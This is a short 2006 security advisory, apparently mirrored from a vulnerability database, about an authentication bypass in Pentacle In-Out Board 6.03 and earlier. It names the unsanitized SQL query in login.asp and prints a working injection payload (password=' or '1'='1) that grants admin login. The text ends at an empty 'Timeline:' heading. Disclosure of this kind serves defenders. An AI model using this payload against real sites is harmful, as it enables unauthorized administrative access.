Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11597
HistoryFeb 26, 2006 - 12:00 a.m.

Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability

2006-02-2600:00:00
vulners.com
13

–Security Report–
Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass
Vulnerability

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 25/02/06 05:56 AM

Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}

Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method remote attacker can bypass login.asp and login as admin.
Level: Critical

How:
SQL query in line 31 of login.asp which is checking username and password did
not sanitized properly.
POST -> http://[site]/[ptdir]/login.asp?username=any&password=' or '1'='1

Timeline: